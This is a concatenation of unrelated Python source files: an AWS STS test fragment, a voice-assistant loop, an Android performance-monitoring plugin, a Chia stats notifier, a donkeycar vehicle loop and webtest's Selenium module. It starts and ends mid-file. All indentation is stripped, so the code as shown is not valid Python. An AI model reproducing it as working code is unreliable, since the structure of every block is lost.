# endpoint.
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_with_web_identity_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
|
main.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import logging
from threading import Thread, Event
from respeaker import Microphone, Player, pixel_ring
from olaf import Bot, Speech
from olaf.config import Logger
logger = logging.getLogger('olaf-voice.main')
def task(quit_event):
mic = Microphone(quit_event=quit_event)
player = Player(mic.pyaudio_instance)
pixel_ring.set_color(rgb=0x505000)
time.sleep(3)
speech = Speech()
myBot = Bot()
while not quit_event.is_set():
if mic.wakeup(keyword='olaf'):
pixel_ring.listen()
data = mic.listen()
pixel_ring.wait()
text = speech.recognize(data)
if text:
logger.debug('Recognized : %s', text)
result = myBot.request(text)
pixel_ring.speak(4, 0)
audio = speech.synthetize(result)
if (audio != None):
player.play_raw(audio)
pixel_ring.off()
mic.close()
pixel_ring.off()
def main():
Logger()
logger.info("Starting application")
quit_event = Event()
thread = Thread(target=task, args=(quit_event,))
thread.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt = Quit")
quit_event.set()
break
thread.join()
if __name__ == '__main__':
main() |
__init__.py | # coding: utf-8
#
from __future__ import absolute_import, print_function
import threading
import re
import time
import datetime
import csv
import sys
import atexit
from collections import namedtuple
_MEM_PATTERN = re.compile(r'TOTAL[:\s]+(\d+)')
# acct_tag_hex is a socket tag
# cnt_set==0 are for background data
# cnt_set==1 are for foreground data
_NetStats = namedtuple(
"NetStats",
"""idx iface acct_tag_hex uid_tag_int cnt_set rx_bytes rx_packets
tx_bytes tx_packets rx_tcp_bytes rx_tcp_packets rx_udp_bytes rx_udp_packets rx_other_bytes rx_other_packets
tx_tcp_bytes tx_tcp_packets tx_udp_bytes tx_udp_packets tx_other_bytes tx_other_packets"""
.split())
class Perf(object):
def __init__(self, d, package_name=None):
self.d = d
self.package_name = package_name
self.csv_output = "perf.csv"
self.debug = False
self.interval = 1.0
self._th = None
self._event = threading.Event()
self._condition = threading.Condition()
self._data = {}
def shell(self, *args, **kwargs):
# print("Shell:", args)
return self.d.shell(*args, **kwargs)
def memory(self):
""" PSS(KB) """
output = self.shell(['dumpsys', 'meminfo', self.package_name]).output
m = _MEM_PATTERN.search(output)
if m:
return int(m.group(1))
return 0
def _cpu_rawdata_collect(self, pid):
"""
pjiff maybe 0 if /proc/<pid>stat not exists
"""
first_line = self.shell(['cat', '/proc/stat']).output.splitlines()[0]
assert first_line.startswith('cpu ')
# ds: user, nice, system, idle, iowait, irq, softirq, stealstolen, guest, guest_nice
ds = list(map(int, first_line.split()[1:]))
total_cpu = sum(ds)
idle = ds[3]
proc_stat = self.shell(['cat',
'/proc/%d/stat' % pid]).output.split(') ')
pjiff = 0
if len(proc_stat) > 1:
proc_values = proc_stat[1].split()
utime = int(proc_values[11])
stime = int(proc_values[12])
pjiff = utime + stime
return (total_cpu, idle, pjiff)
def cpu(self, pid):
""" CPU
Refs:
- http://man7.org/linux/man-pages/man5/proc.5.html
- [安卓性能测试之cpu占用率统计方法总结](https://www.jianshu.com/p/6bf564f7cdf0)
"""
store_key = 'cpu-%d' % pid
# first time jiffies, t: total, p: process
if store_key in self._data:
tjiff1, idle1, pjiff1 = self._data[store_key]
else:
tjiff1, idle1, pjiff1 = self._cpu_rawdata_collect(pid)
time.sleep(.3)
# second time jiffies
self._data[
store_key] = tjiff2, idle2, pjiff2 = self._cpu_rawdata_collect(pid)
# calculate
pcpu = 0.0
if pjiff1 > 0 and pjiff2 > 0:
pcpu = 100.0 * (pjiff2 - pjiff1) / (tjiff2 - tjiff1) # process cpu
scpu = 100.0 * ((tjiff2 - idle2) -
(tjiff1 - idle1)) / (tjiff2 - tjiff1) # system cpu
assert scpu > -1 # maybe -0.5, sometimes happens
scpu = max(0, scpu)
return round(pcpu, 1), round(scpu, 1)
def netstat(self, pid):
"""
Returns:
(rall, tall, rtcp, ttcp, rudp, tudp)
"""
m = re.search(r'^Uid:\s+(\d+)',
self.shell(['cat', '/proc/%d/status' % pid]).output,
re.M)
if not m:
return (0, 0)
uid = m.group(1)
lines = self.shell(['cat',
'/proc/net/xt_qtaguid/stats']).output.splitlines()
traffic = [0] * 6
def plus_array(arr, *args):
for i, v in enumerate(args):
arr[i] = arr[i] + int(v)
for line in lines:
vs = line.split()
if len(vs) != 21:
continue
v = _NetStats(*vs)
if v.uid_tag_int != uid:
continue
if v.iface != 'wlan0':
continue
# all, tcp, udp
plus_array(traffic, v.rx_bytes, v.tx_bytes, v.rx_tcp_bytes,
v.tx_tcp_bytes, v.rx_udp_bytes, v.tx_udp_bytes)
store_key = 'netstat-%s' % uid
result = []
if store_key in self._data:
last_traffic = self._data[store_key]
for i in range(len(traffic)):
result.append(traffic[i] - last_traffic[i])
self._data[store_key] = traffic
return result or [0] * 6
def _current_view(self, app=None):
d = self.d
views = self.shell(['dumpsys', 'SurfaceFlinger',
'--list']).output.splitlines()
if not app:
app = d.current_app()
current = app['package'] + "/" + app['activity']
surface_curr = 'SurfaceView - ' + current
if surface_curr in views:
return surface_curr
return current
def _dump_surfaceflinger(self, view):
valid_lines = []
MAX_N = 9223372036854775807
for line in self.shell(
['dumpsys', 'SurfaceFlinger', '--latency',
view]).output.splitlines():
fields = line.split()
if len(fields) != 3:
continue
a, b, c = map(int, fields)
if a == 0:
continue
if MAX_N in (a, b, c):
continue
valid_lines.append((a, b, c))
return valid_lines
def _fps_init(self):
view = self._current_view()
self.shell(["dumpsys", "SurfaceFlinger", "--latency-clear", view])
self._data['fps-start-time'] = time.time()
self._data['fps-last-vsync'] = None
self._data['fps-inited'] = True
def fps(self, app=None):
"""
Return float
"""
if 'fps-inited' not in self._data:
self._fps_init()
view = self._current_view(app)
values = self._dump_surfaceflinger(view)
last_vsync = self._data.get('fps-last-vsync')
last_start = self._data.get('fps-start-time')
try:
idx = values.index(last_vsync)
values = values[idx + 1:]
except ValueError:
pass
duration = time.time() - last_start
if len(values):
self._data['fps-last-vsync'] = values[-1]
self._data['fps-start-time'] = time.time()
return round(len(values) / duration, 1)
def collect(self):
pid = self.d._pidof_app(self.package_name)
if pid is None:
return
app = self.d.current_app()
pss = self.memory()
cpu, scpu = self.cpu(pid)
rbytes, tbytes, rtcp, ttcp = self.netstat(pid)[:4]
fps = self.fps(app)
timestr = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
return {
'time': timestr,
'package': app['package'],
'pss': round(pss / 1024.0, 2), # MB
'cpu': cpu,
'systemCpu': scpu,
'rxBytes': rbytes,
'txBytes': tbytes,
'rxTcpBytes': rtcp,
'txTcpBytes': ttcp,
'fps': fps,
}
def continue_collect(self, f):
try:
headers = [
'time', 'package', 'pss', 'cpu', 'systemCpu', 'rxBytes',
'txBytes', 'rxTcpBytes', 'txTcpBytes', 'fps'
]
fcsv = csv.writer(f)
fcsv.writerow(headers)
update_time = time.time()
while not self._event.isSet():
perfdata = self.collect()
if self.debug:
print("DEBUG:", perfdata)
if not perfdata:
print("perf package is not alive:", self.package_name)
time.sleep(1)
continue
fcsv.writerow([perfdata[k] for k in headers])
wait_seconds = max(0,
self.interval - (time.time() - update_time))
time.sleep(wait_seconds)
update_time = time.time()
f.close()
finally:
self._condition.acquire()
self._th = None
self._condition.notify()
self._condition.release()
def start(self):
if sys.version_info.major < 3:
f = open(self.csv_output, "wb")
else:
f = open(self.csv_output, "w", newline='\n')
def defer_close():
if not f.closed:
f.close()
atexit.register(defer_close)
if self._th:
raise RuntimeError("perf is already running")
if not self.package_name:
raise EnvironmentError("package_name need to be set")
self._data.clear()
self._event = threading.Event()
self._condition = threading.Condition()
self._th = threading.Thread(target=self.continue_collect, args=(f, ))
self._th.daemon = True
self._th.start()
def stop(self):
self._event.set()
self._condition.acquire()
self._condition.wait(timeout=2)
self._condition.release()
if self.debug:
print("DEBUG: perf collect stopped")
def csv2images(self, src=None, target_dir='.'):
"""
Args:
src: csv file, default to perf record csv path
target_dir: images store dir
"""
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import datetime
import os
import humanize
src = src or self.csv_output
if not os.path.exists(target_dir):
os.makedirs(target_dir)
data = pd.read_csv(src)
data['time'] = data['time'].apply(
lambda x: datetime.datetime.strptime(x, "%Y-%m-%d %H:%M:%S.%f"))
timestr = time.strftime("%Y-%m-%d %H:%M")
# network
rx_str = humanize.naturalsize(data['rxBytes'].sum(), gnu=True)
tx_str = humanize.naturalsize(data['txBytes'].sum(), gnu=True)
plt.subplot(2, 1, 1)
plt.plot(data['time'], data['rxBytes'] / 1024, label='all')
plt.plot(data['time'], data['rxTcpBytes'] / 1024, 'r--', label='tcp')
plt.legend()
plt.title(
'\n'.join(
["Network", timestr,
'Recv %s, Send %s' % (rx_str, tx_str)]),
loc='left')
plt.gca().xaxis.set_major_formatter(ticker.NullFormatter())
plt.ylabel('Recv(KB)')
plt.ylim(ymin=0)
plt.subplot(2, 1, 2)
plt.plot(data['time'], data['txBytes'] / 1024, label='all')
plt.plot(data['time'], data['txTcpBytes'] / 1024, 'r--', label='tcp')
plt.legend()
plt.xlabel('Time')
plt.ylabel('Send(KB)')
plt.ylim(ymin=0)
plt.savefig(os.path.join(target_dir, "net.png"))
plt.clf()
plt.subplot(3, 1, 1)
plt.title(
'\n'.join(['Summary', timestr, self.package_name]), loc='left')
plt.plot(data['time'], data['pss'], '-')
plt.ylabel('PSS(MB)')
plt.gca().xaxis.set_major_formatter(ticker.NullFormatter())
plt.subplot(3, 1, 2)
plt.plot(data['time'], data['cpu'], '-')
plt.ylim(0, max(100, data['cpu'].max()))
plt.ylabel('CPU')
plt.gca().xaxis.set_major_formatter(ticker.NullFormatter())
plt.subplot(3, 1, 3)
plt.plot(data['time'], data['fps'], '-')
plt.ylabel('FPS')
plt.ylim(0, 60)
plt.xlabel('Time')
plt.savefig(os.path.join(target_dir, "summary.png"))
if __name__ == '__main__':
import uiautomator2 as u2
pkgname = "com.tencent.tmgp.sgame"
# pkgname = "com.netease.cloudmusic"
u2.plugin_register('perf', Perf, pkgname)
d = u2.connect("10.242.62.224")
print(d.current_app())
# print(d.ext_perf.netstat(5350))
# d.app_start(pkgname)
d.ext_perf.start()
d.ext_perf.debug = True
try:
time.sleep(500)
except KeyboardInterrupt:
d.ext_perf.stop()
d.ext_perf.csv2images()
print("threading stopped") |
stats_manager.py | # std
import logging
from datetime import datetime, timedelta
from typing import List
from threading import Thread
from time import sleep
# project
from . import HarvesterActivityConsumer, WalletAddedCoinConsumer, FinishedSignageConsumer
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.wallet_added_coin_stats import WalletAddedCoinStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from src.chia_log.parsers.wallet_added_coin_parser import WalletAddedCoinMessage
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.notifier.notify_manager import NotifyManager
from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
"""Manage all stat accumulators and trigger daily notification to the user
with a summary from all stats that have been collected for the past 24 hours.
"""
def __init__(self, config: dict, notify_manager: NotifyManager):
self._enable = config.get("enable", False)
self._time_of_day = config.get("time_of_day", 21)
self._frequency_hours = config.get("frequency_hours", 24)
if not self._enable:
logging.warning("Disabled stats and daily notifications")
return
logging.info("Enabled stats for daily notifications")
self._notify_manager = notify_manager
self._stat_accumulators = [
WalletAddedCoinStats(),
FoundProofStats(),
SearchTimeStats(),
NumberPlotsStats(),
EligiblePlotsStats(),
SignagePointStats(),
]
logging.info(
f"Summary notifications will be sent out every {self._frequency_hours} "
f"hours starting from {self._time_of_day} o'clock"
)
self._datetime_next_summary = datetime.now().replace(hour=self._time_of_day, minute=0, second=0, microsecond=0)
while datetime.now() > self._datetime_next_summary:
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
# Start thread
self._is_running = True
self._thread = Thread(target=self._run_loop)
self._thread.start()
def consume_wallet_messages(self, objects: List[WalletAddedCoinMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, WalletAddedCoinConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_harvester_messages(self, objects: List[HarvesterActivityMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, HarvesterActivityConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_signage_point_messages(self, objects: List[FinishedSignagePointMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, FinishedSignageConsumer):
for obj in objects:
stat_acc.consume(obj)
def _send_daily_notification(self):
summary = f"Hello farmer! 👋 Here's what happened in the last {self._frequency_hours} hours:\n"
for stat_acc in self._stat_accumulators:
summary += "\n" + stat_acc.get_summary()
stat_acc.reset()
self._notify_manager.process_events(
[Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
)
def _run_loop(self):
while self._is_running:
if datetime.now() > self._datetime_next_summary:
self._send_daily_notification()
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
sleep(1)
def stop(self):
self._is_running = False
|
vehicle.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
import numpy as np
from threading import Thread
from .memory import Memory
from prettytable import PrettyTable
import traceback
class PartProfiler:
def __init__(self):
self.records = {}
def profile_part(self, p):
self.records[p] = { "times" : [] }
def on_part_start(self, p):
self.records[p]['times'].append(time.time())
def on_part_finished(self, p):
now = time.time()
prev = self.records[p]['times'][-1]
delta = now - prev
thresh = 0.000001
if delta < thresh or delta > 100000.0:
delta = thresh
self.records[p]['times'][-1] = delta
def report(self):
print("Part Profile Summary: (times in ms)")
pt = PrettyTable()
field_names = ["part", "max", "min", "avg"]
pctile = [50, 90, 99, 99.9]
pt.field_names = field_names + [str(p) + '%' for p in pctile]
for p, val in self.records.items():
# remove first and last entry because you there could be one-off
# time spent in initialisations, and the latest diff could be
# incomplete because of user keyboard interrupt
arr = val['times'][1:-1]
if len(arr) == 0:
continue
row = [p.__class__.__name__,
"%.2f" % (max(arr) * 1000),
"%.2f" % (min(arr) * 1000),
"%.2f" % (sum(arr) / len(arr) * 1000)]
row += ["%.2f" % (np.percentile(arr, p) * 1000) for p in pctile]
pt.add_row(row)
print(pt)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.profiler = PartProfiler()
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
part: class
donkey vehicle part has run() attribute
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition : boolean
If a part should be run or not
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
print('Adding part {}.'.format(p.__class__.__name__))
entry = {}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
self.profiler.profile_part(part)
# we start the UWB reading part here to check its function, if it is not working properly, we have to do reinsertion
if p.__class__.__name__ == 'UWBClass':
t.start()
def remove(self, part):
"""
remove part form list
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinite loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maximum number of loops the drive loop should execute. This is
used for testing that all the parts of the vehicle work.
verbose: bool
If debug output should be printed into shell
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread if not UWB (aready started when adding it)
if entry.get('part').__class__.__name__ != 'UWBClass':
entry.get('thread').start()
# wait until the parts warm up.
print('Starting vehicle at {} Hz'.format(rate_hz))
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loopcount
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
# print a message when could not maintain loop rate.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop '
'with {0:4.0f}ms'.format(abs(1000 * sleep_time)))
if verbose and loop_count % 200 == 0:
self.profiler.report()
except KeyboardInterrupt:
pass
except Exception as e:
traceback.print_exc()
finally:
self.stop()
def update_parts(self):
'''
loop over all parts
'''
for entry in self.parts:
run = True
# check run condition, if it exists
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
if run:
# get part
p = entry['part']
# start timing part run
self.profiler.on_part_start(p)
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
# finish timing part run
self.profiler.on_part_finished(p)
def stop(self):
print('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
# usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
self.profiler.report()
|
sel.py | # (c) 2005 Ian Bicking and contributors; written for Paste
# (http://pythonpaste.org)
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
"""
Routines for testing WSGI applications with selenium.
Most interesting is :class:`~webtest.sel.SeleniumApp` and the
:func:`~webtest.sel.selenium` decorator
"""
import os
import cgi
import sys
import time
import signal
import socket
import types
import webob
import logging
import warnings
import tempfile
import unittest
import threading
import subprocess
from functools import wraps
from webtest import app as testapp
from wsgiref import simple_server
from contextlib import contextmanager
from webtest.compat import PY3
from webtest.compat import urlencode
from webtest.compat import binary_type
from webtest.compat import HTTPConnection
from webtest.compat import CannotSendRequest
from webtest.compat import HTTPServer
from webtest.compat import SimpleHTTPRequestHandler
try:
import json
except ImportError:
try:
import simplejson as json # NOQA
except:
json = False
try:
unicode()
except NameError:
unicode = str
log = logging.getLogger(__name__)
if 'SELENIUM_VERBOSE':
log.addHandler(logging.StreamHandler(sys.stderr))
log.setLevel(logging.DEBUG)
class SeleniumWarning(Warning):
"""Specific warning category"""
HAS_UPLOAD_SUPPORT = ('*chrome', '*firefox')
############
# Decorator
############
def function_decorator(func):
"""run test with selenium. create a new session if needed"""
@wraps(func)
def wrapper(*args):
if is_available():
if args and isinstance(args[0], unittest.TestCase):
self = args[0]
if isinstance(self.app, SeleniumApp):
func(self)
else:
old_app = self.app
self.app = SeleniumApp(self.app.app)
try:
func(self)
finally:
self.app.close()
self.app = old_app
else:
# function
func(*args)
return wrapper
def context_manager(resp):
"""A context mamanger to create a session inside a test"""
resp.updated = False
if not is_available():
yield None
else:
test_app = resp.test_app
app = SeleniumApp(test_app.app)
for h, v in resp.request.headers.items():
if h.lower() not in ('host',):
app.browser.addCustomRequestHeader(h, v)
fd = tempfile.NamedTemporaryFile(prefix='webtest-selenium-',
suffix='.html')
fd.write(resp.body)
fd.flush()
response = app.get('/__file__', dict(__file__=fd.name))
try:
yield response
finally:
body = app.browser.getHtmlSource()
if PY3:
body = body.encode(resp.charset or 'utf-8')
resp.body = body
resp._forms_indexed = None
resp.updated = True
app.close()
fd.close()
def selenium(obj):
"""A callable usable as:
- class decorator
- function decorator
- contextmanager
"""
if isinstance(obj, type):
if is_available():
return obj
elif isinstance(obj, types.FunctionType):
return function_decorator(obj)
elif isinstance(obj, testapp.TestResponse):
return contextmanager(context_manager)(obj)
else:
raise RuntimeError('Unsuported type %r' % obj)
class Selenium(object):
"""Selenium RC control aka ``browser``
A object use to manipulate DOM nodes. This object allow to use the
underlying selenium api. See Selenium `api
<http://goo.gl/IecEk>`_
You can use the original method name::
browser.fireEvent('id=#myid", 'focus')
Or a more pythonic name::
browser.fire_event('id=#myid", 'focus')
Both are equal to::
browser.execute('fireEvent', 'id=#myid', 'focus')
"""
def __init__(self):
self.host = os.environ.get('SELENIUM_HOST', '127.0.0.1')
self.port = int(os.environ.get('SELENIUM_PORT', 4444))
self.session_id = None
def start(self, url):
self.driver = os.environ.get('SELENIUM_DRIVER',
'*googlechrome')
self.session_id = self.getNewBrowserSession(
self.driver, url, '',
"captureNetworkTraffic=true",
"addCustomRequestHeader=true")
def stop(self):
self.testComplete()
self.session_id = None
def execute(self, cmd, *args):
data = dict([(i + 1, a) for i, a in enumerate(args)], cmd=cmd)
if self.session_id:
data['sessionId'] = self.session_id
data = urlencode(data)
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"
}
conn = HTTPConnection(self.host, self.port)
try:
conn.request("POST", "/selenium-server/driver/", data, headers)
resp = conn.getresponse()
data = resp.read()
finally:
conn.close()
if PY3:
data = str(data, 'utf-8')
if data.startswith('ERROR: Unknown command:'):
raise AttributeError(repr(data))
elif not data.startswith('OK'):
raise RuntimeError(repr(data))
data = data[3:]
if data in ('true', 'false'):
return data == 'true' and True or False
return data
def __getattr__(self, attr):
cmd = _get_command(attr)
def wrapped(*args):
args = [cmd] + [str(a) for a in args]
return self.execute(*args)
wrapped.__name__ = attr
return wrapped
##############
# Webtest API
##############
class SeleniumApp(testapp.TestApp):
"""See :class:`webtest.TestApp`
SeleniumApp only support ``GET`` requests
"""
apps = []
def __init__(self, app=None, url=None, timeout=30000,
extra_environ=None, relative_to=None, **kwargs):
self.app = None
if app:
super(SeleniumApp, self).__init__(app, relative_to=relative_to)
self._run_server(self.app)
url = self.app.url
assert is_available()
self.session_id = None
self._browser = Selenium()
self._browser.start(url)
self.extra_environ = extra_environ or {}
self.timeout = timeout
self.test_app = self
@property
def browser(self):
"""The current :class:`~webtest.sel.Selenium`"""
return self._browser
@property
def has_upload_support(self):
return self._browser.driver in HAS_UPLOAD_SUPPORT
def do_request(self, req, status, expect_errors):
if req.method != 'GET':
raise testapp.AppError('Only GET are allowed')
if self.app:
req.host = '%s:%s' % self.app.bind
self.browser.captureNetworkTraffic('json')
for h, v in req.headers.items():
if h.lower() not in ('host',):
self.browser.addCustomRequestHeader(h, v)
self.browser.open(req.url)
resp = self._get_response()
if not expect_errors:
self._check_status(status, resp)
if not status:
status = resp.status_int
if not (status > 300 and status < 400):
self._check_errors(resp)
return resp
def _get_response(self, resp=None, timeout=None):
"""Get responses responses from selenium"""
if timeout != 0:
timeout = timeout or self.timeout
self.browser.waitForPageToLoad(timeout)
trafic = json.loads(self.browser.captureNetworkTraffic('json'))
responses = []
errors = []
for d in trafic:
if d['url'].endswith('.ico'):
continue
req = webob.Request.blank(d['url'])
for h in d['requestHeaders']:
req.headers[h['name']] = h['value']
resp = TestResponse()
resp.app = resp.test_app = self.test_app
resp.browser = self.test_app.browser
resp.responses = responses
resp.errors = errors
resp.request = req
resp.status = str(d['statusCode'])
for h in d['responseHeaders']:
resp.headers[h['name']] = h['value']
if resp.status_int == 200 and 'text/' in resp.content_type:
if not resp.charset:
resp.charset = 'utf-8'
if resp.status_int > 400:
errors.append('%s %r' % (resp.request.url, resp))
if 'html' in resp.content_type or resp.status_int != 200:
responses.append(resp)
if responses:
resp = responses.pop(0)
return resp
elif resp is not None:
return resp
else:
raise LookupError('No response found')
def _run_server(self, app):
"""Run a wsgi server in a separate thread"""
ip, port = _free_port()
self.app = app = WSGIApplication(app, (ip, port))
def run():
httpd = simple_server.make_server(
ip, port, app,
server_class=WSGIServer,
handler_class=WSGIRequestHandler)
httpd.serve_forever()
app.thread = threading.Thread(target=run)
app.thread.start()
conn = HTTPConnection(ip, port)
time.sleep(.5)
for i in range(100):
try:
conn.request('GET', '/__application__')
conn.getresponse()
except (socket.error, CannotSendRequest):
time.sleep(.3)
else:
break
def close(self):
"""Close selenium and the WSGI server if needed"""
if self.app:
conn = HTTPConnection(*self.app.bind)
for i in range(100):
try:
conn.request('GET', '/__kill_application__')
conn.getresponse()
except socket.error:
conn.close()
break
else:
time.sleep(.3)
if 'SELENIUM_KEEP_OPEN' not in os.environ:
self.browser.stop()
if 'SELENIUM_PID' in os.environ:
os.kill(int(os.environ['SELENIUM_PID']), signal.SIGTERM)
class TestResponse(testapp.TestResponse):
def follow(self, status=None, **kw):
"""If this request is a redirect, follow that redirect. It
is an error if this is not a redirect response. Returns
another response object.
"""
if not (self.status_int >= 300 and self.status_int < 400):
raise ValueError(
'You can only follow 301 and 302. Not %s' % self.status_int)
if len(self.responses):
resp = self.responses[0]
if not kw.get('expect_errors', False):
self.app._check_status(status, resp)
if not status:
self.app._check_errors(resp)
return self.responses.pop(0)
raise LookupError('Responses queue is empty. Nothing to follow.')
def click(self, description=None, linkid=None, href=None,
anchor=None, index=None, verbose=False,
extra_environ=None, timeout=None):
link = self.doc.link(description=description, linkid=linkid,
href=href, index=index)
link.click()
if timeout == 0:
return self
return self.test_app._get_response(resp=self, timeout=timeout)
@property
def forms(self):
return Forms(self)
@property
def form(self):
return Form(self, 0)
def _body__get(self):
body = self.browser.getHtmlSource()
if PY3:
return body.encode(self.charset or 'utf-8')
if isinstance(body, binary_type):
return unicode(body, self.charset or 'utf-8')
else:
return body
body = property(_body__get)
def __contains__(self, item):
if isinstance(item, Element):
return item.isElementPresent()
return super(TestResponse, self).__contains__(item)
@property
def doc(self):
"""Expose a :class:`~webtest.browser.Document`"""
return Document(self)
##########
# DOM
##########
class Element(object):
"""A object use to manipulate DOM nodes. This object allow to use the
underlying selenium api for the specified locator. See Selenium `api
<http://goo.gl/IecEk>`_
You can use the original method name::
element.fireEvent('focus')
Or a more pythonic name::
element.fire_event('focus')
Both are equal to::
browser.execute('fireEvent', element.locator, 'focus')
"""
def __init__(self, resp, locator):
self.browser = resp.browser
self.resp = resp
self.locator = locator
def __getattr__(self, attr):
cmd = _get_command(attr)
def wrapped(*args):
args = [cmd, self.locator] + [str(a) for a in args]
return self.browser.execute(*args)
wrapped.__name__ = attr
return wrapped
def exist(self):
"""return true is the element is present"""
return self.isElementPresent()
def wait(self, timeout=3000):
"""Wait for an element and return this element"""
script = "selenium.isElementPresent(%r) || null" % str(self)
try:
self.browser.waitForCondition(script, timeout)
except RuntimeError:
raise RuntimeError("Can't find %s after %sms" % (self, timeout))
return self
def wait_and_click(self, timeout=3000):
"""Wait for an element, click on it and return this element"""
return self.wait().click()
def hasClass(self, name):
"""True iif the class is present"""
classes = self.attr('class').split()
return name in classes
def html(self):
"""Return the innerHTML of the element"""
return self.eval('e.innerHTML')
def text(self):
"""Return the text of the element"""
return self.getText()
def attr(self, attr):
"""Return the attribute value of the element"""
return self.eval('e.getAttribute(%r)' % str(attr))
def drag_and_drop(self, element):
"""Drag and drop to element"""
return self.dragAndDropToObject(element)
def value__get(self):
return self.getValue()
def value__set(self, value):
value = _get_value(value)
script = """(function() {
s.doFireEvent(l, "focus");
s.doType(l, %s);
e.setAttribute("value", %s);
s.doFireEvent(l, "keydown");
s.doFireEvent(l, "keypress");
s.doFireEvent(l, "keyup");
}())""" % (value, value)
self.eval(script)
value = property(value__get, value__set)
def eval(self, *expr):
"""Eval a javascript expression in Selenium RC. You can use the
following variables:
- s: the ``selenium`` object
- b: the ``browserbot`` object
- l: the element locator string
- e: the element itself
"""
script = (
"(function(s) {"
"var l = %r;"
"var b = s.browserbot; var e = b.findElement(l);"
"var res = %s; return res || 'null';"
"}(this))"
) % (str(self), ''.join(expr).strip(';'))
try:
return self.browser.getEval(script)
except RuntimeError:
raise RuntimeError(script)
def __contains__(self, s):
if isinstance(s, Element):
s = s.html()
return s in self.html()
def __nonzero__(self):
return self.exist()
__bool__ = __nonzero__
def __repr__(self):
return '<%s at %s>' % (self.__class__.__name__, self.locator)
def __str__(self):
return str(self.locator.replace('"', "'"))
class Document(object):
"""The browser document. ``resp.doc.myid`` is egual to
``resp.doc.css('#myid')``"""
def __init__(self, resp):
self.resp = resp
def __getattr__(self, attr):
return Element(self.resp, 'css=#%s' % attr)
def get(self, tag, **kwargs):
"""Return an element matching ``tag``, an ``attribute`` and an
``index``. For example::
resp.doc.get('input', name='go') => xpath=//input[@name="go"]
resp.doc.get('li', description='Item') => xpath=//li[.="Item"]
"""
locator = _eval_xpath(tag, **kwargs)
return Element(self.resp, locator)
def xpath(self, path):
"""Get an :class:`~webtest.browser.Element` using xpath"""
return Element(self.resp, 'xpath=%s' % path)
def css(self, selector):
"""Get an :class:`~webtest.browser.Element` using a css selector"""
return Element(self.resp, 'css=%s' % selector)
def link(self, description=None, linkid=None, href=None, index=None):
"""Get a link"""
return self.get('a', description=description, id=linkid,
href=href, index=index)
def input(self, value=None, name=None, inputid=None, index=None):
"""Get an input field"""
return self.get('input', id=inputid,
value=value, name=name, index=index)
def button(self, description=None, buttonid=None, index=None):
"""Get a button"""
return self.get('button', description=description,
id=buttonid, index=index)
def __contains__(self, s):
if isinstance(s, Element):
return s.exist()
return self.browser.isTextPresent(_get_value(s))
def __call__(self, locator):
return Element(locator)
###########
# Forms
###########
class Field(testapp.Field, Element):
classes = {}
def __init__(self, *args, **kwargs):
